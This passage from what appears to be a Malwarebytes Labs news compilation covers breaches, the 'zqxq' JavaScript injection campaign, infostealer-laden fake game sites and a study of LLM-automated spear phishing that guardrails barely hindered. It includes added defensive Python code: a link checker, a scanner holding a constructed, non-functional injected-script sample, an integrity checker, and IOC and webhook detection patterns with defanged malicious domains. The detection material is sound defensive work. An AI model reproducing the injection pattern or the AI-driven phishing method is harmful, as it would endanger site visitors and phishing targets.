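# in the same style as the article.
SAMPLE_LINKS = [
    ("USPS", "https://tools.usps.com/go/TrackConfirmAction"),
    ("USPS", "https://usps.com-track.infoam[.]xyz/redelivery"),
    ("EVRI", "https://evri[.]top/parcel/12345"),
    ("EVRI", "https://www.evri.com/track"),
]


def refang(link: str) -> str:
    """Undo [.] defanging so the URL parser sees a normal hostname."""
    return link.replace("[.]", ".")


def registrable_domain(host: str) -> str:
    """Return the last two DNS labels of a hostname.

    Good enough for .com/.xyz/.top; a production checker should consult the
    Public Suffix List so that domains such as example.co.uk are handled.
    """
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def check_link(brand: str, link: str) -> dict:
    """Classify one link as ok or suspicious and say why."""
    host = urlsplit(refang(link)).hostname or ""
    actual = registrable_domain(host)
    expected = EXPECTED_DOMAINS[brand]
    if actual == expected:
        verdict, reason = "ok", "registrable domain matches the brand"
    elif expected in host:
        # The brand's domain is only a fragment of the hostname (a subdomain or
        # part of a label); the domain that actually resolves is `actual`.
        verdict, reason = "suspicious", f"brand domain embedded in hostname; real domain is {actual}"
    elif actual.split(".")[0] == expected.split(".")[0]:
        verdict, reason = "suspicious", f"same name under a different TLD ({actual} vs {expected})"
    else:
        verdict, reason = "suspicious", f"unrelated domain {actual}"
    return {"host": host, "domain": actual, "verdict": verdict, "reason": reason}


def check_all(links=SAMPLE_LINKS) -> list:
    """Run the check over every (brand, link) pair."""
    return [check_link(brand, link) for brand, link in links]


if __name__ == "__main__":
    for result in check_all():
        print(f"{result['verdict']:10} {result['host']:35} {result['reason']}")
```

The check deliberately ignores everything before the registrable domain, because that is exactly the part of a hostname an attacker controls when they register `infoam[.]xyz`; the legitimate `tools.usps.com` passes for the same reason.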
We don’t just report on threats—we remove them
Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.
A week in security (January 6 – January 12)
Last week on Malwarebytes Labs:
- Dental group lied through teeth about data breach, fined $350,000
- AI-supported spear phishing fools more than 50% of targets
- US Cyber Trust Mark logo for smart devices is coming
- GroupGreeting e-card site attacked in “zqxq” campaign
- Massive breach at location data seller: “Millions” of users affected
- Google Chrome AI extensions deliver info-stealing malware in broad attack
- BayMark Health Services sends breach notifications after ransomware attack
Last week on ThreatDown:
Stay safe!
Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.
BayMark Health Services sends breach notifications after ransomware attack
BayMark Health Services, Inc. (BayMark) notified an unknown number of patients that attackers stole their personal and health information.
BayMark profiles itself as North America’s largest provider of medication-assisted treatment (MAT) for substance use disorders helping tens of thousands of individuals with recovery.
In a breach notification, the company disclosed that on October 11, 2024 it learned about an incident that disrupted the operations of some of its IT systems. This incident consisted of an unauthorized party accessing some of the files on BayMark’s systems between September 24 and October 14 of last year.
An investigation showed that the exposed files contained information that varied per patient but could have included the patient’s name and one or more of the following:
- Social Security number (SSN)
- Driver’s license number
- Date of birth
- The services received and the dates of service
- Insurance information
- Treating provider
- Treatment and/or diagnostic information
While BayMark did not provide any information about the number of victims or the nature of the incident, it has been separately reported that the RansomHub ransomware group has BayMark listed on their leak site.
The RansomHub ransomware group claims to have exfiltrated an enormous 1.5 terabytes of sensitive data from BayMark Health Services.
BayMark’s listing on RansomHub leak site
The date on the dark web site matches the date published in the breach notification. Further, the fact that the data are listed as “published” means that BayMark did not pay the ransom, which the cybercriminals confirm when you click through on the company’s tile.
Here, the ransomware group lays blame on the company itself. This isn’t rare for a ransomware group, as the tactics and vernacular are often based around shame, guilt, and a pre-teen-like arrogance. As claimed in the dark web site:
One of the few companies from Texas that does not value its data. For a nominal fee, they could have not worried about anything, improved their network and protected themselves. But they chose the path of destroying their reputation, publishing sensitive data and publicizing it in the media.
{names}
These people decided to do other things than their company. BayMark Health Services is dedicated to providing treatment tailored to meet each person regardless of where they are in their recovery journey. BayMark provides a full continuum of care, integrating evidence-based practices, clinical counseling, recovery support, and medical services.
Protecting yourself after a data breach
There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.
- Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
- Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
- Enable two-factor authentication (2FA). If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
- Watch out for fake vendors. The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
- Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
- Consider not storing your card details. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
- Set up identity monitoring. Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.
Google Chrome AI extensions deliver info-stealing malware in broad attack
Small businesses and boutique organizations should use caution when leaning on browser-friendly artificial intelligence (AI) tools to generate ideas, content, and marketing copy, as a set of Google Chrome extensions were recently compromised to deliver info-stealing malware disguised as legitimate updates.
Analyzed by researchers at Extension Total, the cybercriminal campaign has managed to take over the accounts of at least 36 Google Chrome extensions that provide AI and VPN services. The compromised extensions include “Bard AI Chat,” “ChatGPT for Google Meet,” “ChatGPT App,” “ChatGPT Quick Access,” “VPNCity,” “Internxt VPN,” and more, which are used by an estimated total of 2.6 million people.
Though these browser extensions borrow the names of the most popular AI tools available today, they are third-party tools that are not developed by OpenAI—the company behind ChatGPT—or Google.
In response to the attack, many of the compromised browser extensions removed their tools from the Google Chrome web store to protect users. However, other extensions remain available and in the control of cybercriminals, making them dangerous to download.
There isn’t a startup, small business, or solo practitioner today who can run their operations without a web browser, and the most popular web browser in the world—by far—is Google Chrome.
But this cybercriminal campaign has not compromised Google Chrome itself.
Instead, it has compromised a series of extensions for Google Chrome that could prove attractive to many small businesses looking to harness AI, whether to write email newsletters, edit blogs, or even get ideas for marketing strategies in the new year. These third-party browser extensions, when they were still available, allowed users to directly ask questions to AI tools without needing to navigate away from a current web page.
But with the new attack, those same browser extensions are now delivering fraudulent updates that carry malicious code that can steal an employee’s data.
According to an investigation published by one of the compromised browser extension companies, the malware used in this attack sought data for Facebook Ads accounts. That may sound like a narrow goal, but considering that so many businesses rely on promotion and visibility through Facebook Ads, it isn’t uncommon that this information might be stored on an employee’s computer.
For a full list of compromised extensions, visit here.
Until fixes are released for every compromised extension, warn your employees about which browser extensions are safe to use, and consider creating a policy about only trusting first-party browser extensions for work.
For all other threats, try Malwarebytes Teams, which provides always-on protection against malware, ransomware, spyware, and more, along with 24/7 dedicated, human support.
Massive breach at location data seller: “Millions” of users affected
Like many other data brokers, Gravy is a company you may never have heard of, but it almost certainly knows a lot about you if you’re a US citizen.
Data brokers come in different shapes and sizes. What they have in common is that they gather personally identifiable data from various sources—from publicly available data to stolen datasets—and then sell the gathered data on. Gravy Analytics specializes in location intelligence, meaning it collects sensitive phone location and behavior data.
One of the buyers is the US government, which increasingly circumvents the need to get a warrant by simply buying what it wants to know from a data broker. Ironic, given that the FTC sued Gravy Analytics after saying it routinely collects sensitive phone location and behavior data without getting the consent of consumers.
In the complaint last month, the FTC claimed:
“Respondents [Gravy Analytics and Venntel, a wholly owned subsidiary of Gravy Analytics] have bought, obtained, and collected precise consumer location data and offered for sale, sold, and distributed products and services created from or based on the consumer location data.”
Data brokers have drawn attention this year by leaking several large databases, with the worst being the National Public Data leak. The data breach made international headlines because it affected hundreds of millions of people, and it included Social Security Numbers.
And now, apparently, it’s Gravy Analytics’ turn to be breached. According to 404 Media, cybercriminals breached Gravy Analytics and stole a massive amount of data, including customer lists, information on the broader industry, and location data harvested from smartphones which show people’s precise movements.
The cybercriminals claim to have stolen 17TB of data and are threatening to publish the data. Considering the sensitivity of location data for some groups, this breach could potentially be just as significant as the National Public Data leak.
To prove their possession of the data, the cybercriminals have shared three samples on a Russian forum, exposing millions of location points across the US, Russia, and Europe.
The researcher that posted this map extracted the names of 3455 apps that leaked this information. Many of these apps are games, but we also noted Tinder and a host of apps that are promoted as TikTok video downloaders.
404 Media reports that the personal data of millions of users is affected.
The Gravy Analytics website is down at the moment of writing and nobody at the company has answered any queries with an official reaction.
The whole ordeal, whether the data will be published or not, proves once again why data brokers should stop trading health and location data.
We don’t just report on threats – we help safeguard your entire digital identity
Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.
GroupGreeting e-card site attacked in “zqxq” campaign
This article was researched and written by Stefan Dasic, manager, research and response for ThreatDown, powered by Malwarebytes
Malwarebytes recently uncovered a widespread cyberattack—referred to here as the “zqxq” campaign as it closely mirrors NDSW/NDSX-style malware behavior—that compromised GroupGreeting[.]com, a popular platform used by major enterprises to send digital greeting cards.
This attack is part of a broader malicious campaign that takes advantage of trusted websites with high traffic, especially those that could experience a spike in visitors during busy seasons like the winter holidays. That includes greeting card websites, like GroupGreeting[.]com, that allow users to send group e-cards for birthdays, retirements, weddings, and, of course, holidays like Christmas and New Year’s.
According to public data, over 2,800 websites have been hit with similar malicious code. The seasonal increase in user interactions with greeting card sites provides ample opportunities for cybercriminals to quietly inject malware and target unsuspecting visitors.
Explaining the “zqxq” malware
Understanding this cybercriminal campaign requires a little bit of understanding of the web. Online today, nearly every single modern webpage uses a programming language called JavaScript. JavaScript allows developers to make interactive webpages, but it can also be vulnerable to attacks, as cybercriminals can “inject” pieces of JavaScript into a website that are not approved by the site’s developers.
At the core of this breach is an obfuscated JavaScript snippet designed to blend in with legitimate site files. Hidden within themes, plugins, or other critical scripts, the malicious code uses scrambled variables (e.g., zqxq) and custom functions (HttpClient, rand, token) to evade detection and hamper analysis.
Despite its complexity, the malware performs some very typical functions seen in large-scale JavaScript injection campaigns:
- Token generation and redirection. Generates random tokens (rand() + rand()) for queries or URLs, a technique often used in Traffic Direction Systems (TDS) to disguise malicious links.
- Conditional checks and evasion. References properties in navigator, document, window, or screen to determine if the user has visited before, or to avoid re-infecting the same machine. This helps keep the campaign under the radar by reducing repeated alerts.
- Remote payload retrieval. Uses an XMLHttpRequest (labeled as HttpClient in the code) to silently fetch further malicious scripts or to redirect visitors to exploit kits, phishing sites, or other malicious destinations.
Though Malwarebytes recently discovered the attack on GroupGreeting[.]com, the malware campaign bears similarities to another malware injection campaign that is referred to as both “NDSW/NDSX” and “TDS Parrot.”
According to security researchers from Sucuri, who label these attacks under the “NDSW/NDSX” moniker, this campaign accounted for 43,106 detections in 2024. Similar research was published by Unit 42, which refers to the campaign as “TDS Parrot.”
From these analyses, we can identify the following parallels to known NDSW/NDSX or TDS Parrot malware campaigns:
- Obfuscated redirect scripts. Much like NDSW/NDSX, the zqxq script deeply obfuscates its variables, methods, and flow. The layering of functions (Q, d, rand, token) and the repeated usage of base64-like decoding are standard indicators of TDS JavaScript-based threats.
- Traffic Distribution System behavior. After running checks (e.g., domain name, cookies), these scripts funnel traffic to external pages hosting additional malware payloads or phishing sites. This is precisely how TDS Parrot campaigns divert user traffic across multiple malicious domains to maximize infection rates.
- Large-scale website infections. Both NDSW/NDSX and the zqxq campaign have infected thousands of websites, suggesting a systematic approach—possibly automated—that exploits vulnerabilities in popular CMS platforms (like WordPress, Joomla, or Magento) or outdated plugins, similar to documented TDS Parrot behaviors.
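The behaviours listed in the two lists above (tokenized URLs built from `rand() + rand()`, checks against `navigator`, `document` or `screen`, a remote fetch through an `XMLHttpRequest` wrapper, base64-like blobs and redirects) are the kind of indicators a site owner can look for when sweeping theme and plugin files. The scanner below is an added example, not Malwarebytes’ detection logic or the campaign’s code: the indicator list, the weights and the threshold are assumptions made for the example, and both JavaScript samples are constructed inline (the suspicious one only reproduces the token names and call shapes described in the article; it is not a working script).

```python
"""Heuristic scan of JavaScript files for TDS-style injected code.

Added example. Each indicator is a regular expression with a weight; a file
whose matched weights add up to THRESHOLD or more is reported as suspicious.
The weights and threshold are assumptions for this example.
"""
import re

INDICATORS = [
    # Identifiers the article reports in the zqxq campaign.
    ("known-tokens",   re.compile(r"\b(zqxq|HttpClient)\b"), 3),
    # Tokenized URL parameters built from two random values.
    ("double-rand",    re.compile(r"rand\(\)\s*\+\s*rand\(\)"), 3),
    # Remote retrieval on its own is normal, so it carries little weight.
    ("remote-fetch",   re.compile(r"XMLHttpRequest|\bfetch\s*\("), 1),
    # Visitor fingerprinting / "seen before" checks.
    ("fingerprinting", re.compile(r"\b(navigator|screen)\.\w+|document\.cookie"), 1),
    # Redirecting the browser elsewhere.
    ("redirect",       re.compile(r"(window|document)\.location|location\.(href|replace)"), 2),
    # Decoding of hidden strings.
    ("decode",         re.compile(r"\batob\s*\(|fromCharCode"), 2),
    # Long base64-like string literal.
    ("base64-literal", re.compile(r"['\"][A-Za-z0-9+/]{40,}={0,2}['\"]"), 2),
    # Runs of \xNN escapes used to hide identifiers.
    ("hex-escapes",    re.compile(r"(\\x[0-9a-fA-F]{2}){4,}"), 2),
]
THRESHOLD = 6

# Constructed benign sample: an ordinary feed loader.
BENIGN_JS = """
var xhr = new XMLHttpRequest();
xhr.open("GET", "/api/cards.json");
xhr.onload = function () { render(JSON.parse(xhr.responseText)); };
xhr.send();
"""

# Constructed suspicious sample mirroring the indicators described above.
# It is deliberately non-functional (rand and HttpClient are never defined).
SUSPICIOUS_JS = """
var zqxq = "QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVowMTIzNDU2Nzg5";
function token() { return rand() + rand(); }
if (!document.cookie.match("zq")) {
  var c = new HttpClient();
  c.get(atob(zqxq) + "?t=" + token(), function (r) { window.location = r; });
}
"""


def scan_js(source: str) -> dict:
    """Return the matched indicators, their summed weight and a verdict."""
    hits = [(name, weight) for name, rx, weight in INDICATORS if rx.search(source)]
    score = sum(weight for _, weight in hits)
    return {
        "score": score,
        "indicators": [name for name, _ in hits],
        "suspicious": score >= THRESHOLD,
    }


def scan_samples() -> dict:
    """Scan both constructed samples; useful as a smoke test of the rules."""
    return {"benign": scan_js(BENIGN_JS), "suspicious": scan_js(SUSPICIOUS_JS)}


if __name__ == "__main__":
    for label, result in scan_samples().items():
        print(label, result)
```

A single indicator such as `XMLHttpRequest` is normal in legitimate code, which is why it scores low; the campaign is recognisable by the combination of token generation, fingerprinting, decoding and redirection in one snippet, and that combination is what pushes a file over the threshold.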
Cybercriminals hardly strike at random. Instead, the attack on GroupGreeting was likely coordinated because of its potential for success. Here are a few reasons why:
- High-profile site. GroupGreeting boasts over 25,000 workplace clients, including major brands like Airbnb, Coca-Cola, and eBay, making it a lucrative target. Visitors are more inclined to trust links from a service they deem reputable.
- Seasonal traffic spikes. During holidays and other high-traffic periods, the site sees a surge in e-card use. Cybercriminals exploit this surge to maximize the spread of redirects and malware.
- Sophisticated persistence. Malicious code can hide in multiple files or within the database. Deleting one infected file may not remove all traces, allowing reinfection to occur.
- Potential consequences. Once the malware activates in a user’s browser, it typically redirects them to external domains that host secondary payloads. These payloads can range from phishing pages—designed to steal credentials—to more devastating forms of malware like info stealers or ransomware. Attackers often generate random or “tokenized” URLs, making it difficult for basic blocklists to keep pace.
Site owners can reduce the risk of this kind of injection with a few basic measures:
- Timely patching and updates. Attacks often succeed by exploiting vulnerabilities in outdated CMS installations or plugins, underscoring the importance of regular updates.
- File integrity checks. Automated monitoring systems can detect and flag any unauthorized file changes, prompting swift action.
- User training. Educate users on potential risks and signs of compromise—even “safe” or well-known websites can be hijacked.
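The file integrity check recommended above comes down to keeping a baseline of hashes for the site’s scripts and comparing against it on a schedule, so that a modified theme file, a dropped-in plugin file or a deleted file is reported. The following is an added example, not a Malwarebytes tool or GroupGreeting’s setup: it builds such a baseline over a directory tree, and its `demo()` function stages a constructed WordPress-style tree in a temporary directory and simulates the three kinds of unauthorized change.

```python
"""Baseline-and-diff file integrity check for a web root.

Added example. build_baseline() hashes every script file under a directory;
diff_baseline() reports what was added, removed or modified since the
previous run. The sample tree in demo() is constructed for this example.
"""
import hashlib
import tempfile
from pathlib import Path

# File types worth tracking; extend for the CMS in use.
TRACKED_SUFFIXES = (".js", ".php", ".html")


def sha256_file(path: Path) -> str:
    """Hash a file in chunks so large assets do not need to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root: Path, suffixes=TRACKED_SUFFIXES) -> dict:
    """Map each tracked file's path (relative to root) to its SHA-256."""
    return {
        p.relative_to(root).as_posix(): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file() and p.suffix in suffixes
    }


def diff_baseline(old: dict, new: dict) -> dict:
    """Compare two baselines and list the changes."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(k for k in old.keys() & new.keys() if old[k] != new[k]),
    }


def demo() -> dict:
    """Stage a constructed site tree, take a baseline, then simulate tampering."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        theme = root / "wp-content" / "themes" / "site" / "footer.js"
        theme.parent.mkdir(parents=True)
        theme.write_text("document.getElementById('year').textContent = new Date().getFullYear();\n")
        plugin = root / "wp-content" / "plugins" / "legacy.php"
        plugin.parent.mkdir(parents=True)
        plugin.write_text("<?php // legacy plugin ?>\n")
        (root / "index.html").write_text("<html></html>\n")
        baseline = build_baseline(root)

        # Simulated unauthorized changes: a tail appended to the theme script,
        # a new file dropped into the plugins directory, and a file deleted.
        with theme.open("a") as fh:
            fh.write("/* appended content */\n")
        (root / "wp-content" / "plugins" / "cache.js").write_text("// dropped file\n")
        plugin.unlink()

        return diff_baseline(baseline, build_baseline(root))


if __name__ == "__main__":
    print(demo())
```

Store the baseline somewhere the web server cannot write to (or sign it), otherwise an attacker who can modify theme files can also update the baseline. This check covers files only; injected code stored in the database, which the article notes is also possible, needs a separate check over the relevant tables.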
US Cyber Trust Mark logo for smart devices is coming
The White House announced the launch of the US Cyber Trust Mark which aims to help buyers make an informed choice about the purchase of wireless internet-connected devices, such as baby monitors, doorbells, thermostats, and more.
The cybersecurity labeling program for wireless consumer Internet of Things (IoT) products is voluntary, but the participants include several major manufacturers, retailers, and trade associations for popular electronics, appliances, and consumer products. The companies and groups said they are committed to increasing cybersecurity for the products they sell.
Justin Brookman, director of technology policy at the consumer watchdog organization Consumer Reports, lauded the government effort and the companies that have already pledged their participation.
“Consumer Reports is eager to see this program deliver a meaningful U.S. Cyber Trust Mark that lets consumers know their connected devices meet fundamental cybersecurity standards,” Brookman said in a news release. “The mark will also inform consumers whether or not a company plans to stand behind the product with software updates and for how long.”
The Federal Communications Commission (FCC) proposed and created the labelling program and hopes it will raise the bar for cybersecurity across common devices, including smart refrigerators, smart microwaves, smart televisions, smart climate control systems, smart fitness trackers, and more.
The idea is that the Cyber Trust Mark logo will be accompanied by a QR code that consumers can scan for easy-to-understand details about the security of the product, such as the support period for the product and whether software patches and security updates are automatic.
The program is challenging because of the wide variety of consumer IoT products on the market that communicate over wireless networks. These products are built on different technologies, each with their own security pitfalls, so it will be hard to compare them, but at least the consumer will be able to find some basic—but important—information.
Even though participation is voluntary, manufacturers will be incentivized to make their smart devices more secure to keep the business of consumers who will choose only products that carry the Cyber Trust Mark.
As we explained recently, the “Internet of Things” is the now-accepted term to describe countless home products that connect to the internet so that they can be controlled and monitored from a mobile app or from a web browser on your computer. The benefits are obvious for shoppers. Thermostats can be turned off during vacation, home doorbells can be answered while at work, and gaming consoles can download videogames as children sleep.
And in 2024 we saw several mishaps ranging from privacy risks to downright unacceptable abuse. So, if we can prevent these incidents from happening again, then it surely is worth the trouble.
The testing of whether a product deserves the Cyber Trust Mark will be done by accredited labs and against established cybersecurity criteria from the National Institute of Standards and Technology (NIST).
The Cyber Trust Mark has been under construction for quite a while: it was approved in a unanimous bipartisan vote last March, and we can expect the first logos to show up this year. And Anne Neuberger, deputy national security adviser for cyber, revealed that there are plans to release another executive order saying that, beginning in 2027, the Federal government will only buy devices that have the Cyber Trust Mark label on them.
For now, the program does not apply to personal computers, smartphones, and routers.
AI-supported spear phishing fools more than 50% of targets
One of the first things everyone predicted when artificial intelligence (AI) became more commonplace was that it would assist cybercriminals in making their phishing campaigns more effective.
Now, researchers have conducted a scientific study into the effectiveness of AI-supported spear phishing, and the results line up with everyone’s expectations: AI is making it easier to commit crimes.
The study, titled Evaluating Large Language Models’ Capability to Launch Fully Automated Spear Phishing Campaigns: Validated on Human Subjects, evaluates the capability of large language models (LLMs) to conduct personalized phishing attacks and compares their performance with human experts and AI models from last year.
To this end the researchers developed and tested an AI-powered tool to automate spear phishing campaigns. They used AI agents based on GPT-4o and Claude 3.5 Sonnet to search the web for available information on a target and use this for highly personalized phishing messages.
With these tools, the researchers achieved a click-through rate (CTR) that marketing departments can only dream of, at 54%. The control group received arbitrary phishing emails and achieved a CTR of 12% (roughly 1 in 8 people clicked the link).
Another group was tested against an email generated by human experts which proved to be just as effective as the fully AI automated emails and got a 54% CTR. But the human experts did this at 30 times the cost of the AI automated tools.
The AI tools with human assistance outperformed the CTR of these groups by scoring 56% at 4 times the cost of the AI automated tools. This means that some (expert) human input can improve the CTR, but is it enough to justify the investment of time? Cybercriminals are proverbially lazy, which means they often exhibit a preference for efficiency and minimal effort in their operations, so we don’t expect them to consider the extra 2% worth the investment.
The research also showed a significant improvement of the deceptive capabilities of AI models compared to last year, where studies found that AI models needed human assistance to perform on par with human experts.
The key to the success of a phishing email is the level of personalization, which the AI-assisted method achieves by letting an AI web-browsing agent crawl publicly available information about the target and use it as the basis for the message.
Example from the paper showing how collected information is used to write a spear phishing email
Based on information found online about the target, they are invited to participate in a project that aligns with their interests and presented with a link to a site where they can find more details.
The AI-gathered information was accurate and useful in 88% of cases and only produced inaccurate profiles for 4% of the participants.
Other bad news is that the researchers found that the guardrails which are supposed to stop AI models from assisting cybercriminals are not a noteworthy barrier for creating phishing mails with any of the tested models.
The good news is that LLMs are also getting better at recognizing phishing emails. Claude 3.5 Sonnet scored well above 90% with only a few false alarms and detected several emails that passed human detection, although it struggles with some phishing emails that are clearly suspicious to most humans.
If you’re looking for some guidance on how to recognize AI-assisted phishing emails, we’d like you to read: How to recognize AI-generated phishing mails. But the best way is to always remember the general advice not to click on any links in unsolicited emails.
Dental group lied through teeth about data breach, fined $350,000
A US chain of dental offices known as Westend Dental LLC denied a 2020 ransomware attack and its associated data breach, instead telling their customers that data was lost due to an “accidentally formatted hard drive.”
Unfortunately for the organization, the truth was found out. Westend Dental agreed to settle several violations of the Health Insurance Portability and Accountability Act (HIPAA) with a penalty of $350,000.
In October 2020, Westend Dental was attacked by the Medusa Locker ransomware group. Medusa Locker is a type of ransomware that operates under a Ransomware-as-a-Service (RaaS) model, primarily targeting large enterprises in sectors such as healthcare and education. This ransomware is known for employing double extortion tactics, which means they encrypt victims’ data while also threatening to release sensitive information unless a ransom is paid.
Westend Dental decided not to submit the mandatory notification within 60 days, waiting until October 28, 2022—two years later—to submit a data breach notification form to the State of Indiana.
The Indiana Office of Inspector General (OIG) later uncovered evidence that Westend Dental had experienced a ransomware attack on or around October 20, 2020, involving state residents’ protected health information, but Westend Dental still denied there had been a data breach. The investigation was prompted by a consumer complaint from a Westend Dental patient regarding an unfulfilled request for dental records.
In January 2023 a witness confirmed there had been a data breach, which prompted the Indiana OIG to initiate a wider investigation to assess compliance with the HIPAA rules and state laws. This investigation revealed extensive HIPAA violations.
A selection of the other violations that were found during the investigation include:
- HIPAA policies and procedures were not given to or made readily available to employees.
- The company provided no HIPAA training for employees prior to November 2023.
- There was no evidence that a HIPAA-compliant risk analysis had ever been conducted (lists of usernames and passwords were stored in plain text on the compromised server).
- There were no password policies until at least January 2024 (the same username and password were used for all Westend Dental servers that contained protected health information).
- No physical safeguards were implemented to limit access to servers containing patient data. (Some servers were located, unprotected, in employee break rooms and bathrooms.)
Court documents also reveal that because Westend Dental did not conduct a forensic investigation, the exact number of people affected by the breach is unknown. We do know that Westend Dental served around 17,000 patients across all companies and practices at the time of the ransomware attack.
The attackers initially gained access to at least one server, but since there was no monitoring software in place, it is unknown how far the attackers were able to infiltrate other systems. And since the backups that were made by a third party turned out to be incomplete, they were also unable to inform affected patients.
Some weeks in security (December 16 – January 5)
During the holiday period on Malwarebytes Labs we covered:
- A day in the life of a privacy pro, with Ron de Jesus (Lock and Code S05E26)
- Task scams surge by 400%, but what are they?
- 5 million payment card details stolen in painful reminder to monitor Christmas spending
- AI-generated malvertising “white pages” are fooling detection engines
- Pallet liquidation scams and how to recognize them
- TP-Link faces US national security probe, potential ban on devices
- “Fix It” social-engineering scheme impersonates several brands
- Our Santa wishlist: Stronger identity security for kids
- 2024 in AI: It’s changed the world, but it’s not all good
- Is nowhere safe from AI slop? (Lock and Code S05E27)
- Data breaches in 2024: Could it get any worse?
- Connected contraptions cause conniption for 2024
- “Can you try a game I made?” Fake game sites lead to information stealers
And on the ThreatDown blog we covered:
- Top 5 most dangerous software weaknesses in 2024
- Cleo, the next MOVEit and GoAnywhere?
- Sysrv cryptomining botnet is still alive (and kicking out the competition)
- Clipboard hijacker tries to install a Trojan
- What is session hijacking?
- Which ports to monitor for ransomware attacks
Stay safe!
“Can you try a game I made?” Fake game sites lead to information stealers
The background and the IOCs for this blog were gathered by an Expert helper on our forums and Malwarebytes researchers. Our thanks go out to them.
A new, malicious campaign is making the rounds online and it starts simple: Unwitting targets receive a direct message (DM) on a Discord server asking about their interest in beta testing a new videogame (targets can also receive a text message or an email). Often, the message comes from the “developer” themselves, as asking whether you can try a game that they personally made is a common method to lure victims.
If interested, the victim will receive a download link and a password for the archive containing the promised installer.
The archives are offered for download on various locations like Dropbox, Catbox, and often on the Discord content delivery network (CDN), by using compromised accounts which add extra credibility.
What the target actually downloads and installs is an information-stealing Trojan.
There are several variations going around. Some use NSIS installers, but we have also seen MSI installers. There are also various information stealers being spread through these channels like the Nova Stealer, Ageo Stealer, or the Hexon Stealer.
The Nova Stealer and the Ageo Stealer are Malware-as-a-Service (MaaS) stealers, where criminals rent out the malware and the infrastructure to other criminals. They specialize in stealing credentials stored in most browsers, session cookie theft for platforms like Discord and Steam, and information theft related to cryptocurrency wallets.
Part of the Nova Stealer’s infrastructure is a Discord webhook which allows the criminals to have the server send data to the client whenever a certain event occurs. So they don’t have to check regularly for information, they will be alerted as soon as it gets in.
The Hexon stealer is relatively new, but we know it is based on Stealit Stealer code and capable of exfiltrating Discord tokens, 2FA backup codes, browser cookies, autofill data, saved passwords, credit card details, and even cryptocurrency wallet information.
One of the main interests for the stealers seems to be Discord credentials, which can be used to expand the network of compromised accounts. This also helps them because some of the stolen information includes the friends’ accounts of the victims. By compromising an increasing number of Discord accounts, criminals can fool other Discord users into believing that their everyday friends and contacts are speaking with them, emotionally manipulating those users into falling for even more scams and malware campaigns.
But the end goal of this scam, and most others, is monetary gain. So keep an eye on your digital and fiat currency if you’ve fallen for one of these scams.
How to recognize the fake game sites
There is one very active campaign that uses a standard template for the website. This makes it easier for the cybercriminals to change name and location, but also for us to recognize them.
Example of the templated fake website
The websites are hosted by various companies that are very unresponsive to takedown requests and are usually protected by Cloudflare, which adds an extra layer of difficulty for researchers looking to get the sites taken down. And if a site does get taken down, the criminals easily set up a new one.
Another campaign uses blogspot to host their malware. These sites on blogspot have a different, but also standard, design.
blogspot template
Other effective measures to stay safe from these threats include:
- Having an up-to-date and active anti-malware solution on your computer.
- Verifying invitations from “friends” through a different channel, such as texting them directly or contacting them on another social media platform. Remember, their current account may have been compromised.
- Remembering to not act upon unsolicited messages and emails, especially when they want you to download and install something.
Download sites:
dualcorps[.]fr
leyamor[.]com
crystalsiege[.]com
crystalsiege[.]online
dungeonofdestiny[.]pages.dev
mazenugame[.]blogspot.com
mazenugames[.]blogspot.com
yemozagame[.]blogspot.com
domenubeta[.]blogspot.com
domenugame[.]blogspot.com
The known download sites will be blocked by Malwarebytes/ThreatDown products which will also detect the information stealers.
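For defenders who want to check their own telemetry against the download sites listed above, here is an added example (not code from Malwarebytes or the original post). It refangs the defanged domains, matches them against constructed proxy log lines (the log layout, client addresses and URLs are made up for the example), and additionally flags outbound POST requests to the Discord webhook API path, since the post notes that the Nova Stealer uses a Discord webhook for exfiltration. The exact webhook URL shape is an assumption based on the public Discord API path.

```python
import re
from typing import Iterable

# Defanged download domains from the post (the only page-specific values used here).
DEFANGED_IOCS = [
    "dualcorps[.]fr",
    "leyamor[.]com",
    "crystalsiege[.]com",
    "crystalsiege[.]online",
    "dungeonofdestiny[.]pages.dev",
    "mazenugame[.]blogspot.com",
    "mazenugames[.]blogspot.com",
    "yemozagame[.]blogspot.com",
    "domenubeta[.]blogspot.com",
    "domenugame[.]blogspot.com",
]

# Assumed shape of a Discord webhook URL; a POST here from an ordinary workstation
# is a useful exfiltration signal when no legitimate bot integration is expected.
WEBHOOK_RE = re.compile(
    r"https?://(?:[a-z]+\.)?discord(?:app)?\.com/api/webhooks/\d+/\S+", re.I
)

# Constructed log format: "<timestamp> <client-ip> <method> <url>".
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")
URL_HOST_RE = re.compile(r"^https?://([^/:]+)")

# Constructed sample proxy log; none of these requests are real observations.
SAMPLE_LOG = """\
2025-01-03T10:12:01Z 10.0.0.15 GET https://www.crystalsiege.com/download/Installer.zip
2025-01-03T10:12:07Z 10.0.0.15 GET https://cdn.discordapp.com/attachments/1/2/game.zip
2025-01-03T10:15:44Z 10.0.0.15 POST https://discord.com/api/webhooks/123456789/AbCdEf
2025-01-03T10:16:02Z 10.0.0.22 GET https://example.org/index.html
2025-01-03T10:17:30Z 10.0.0.31 GET http://domenugame.blogspot.com/
"""


def refang(indicator: str) -> str:
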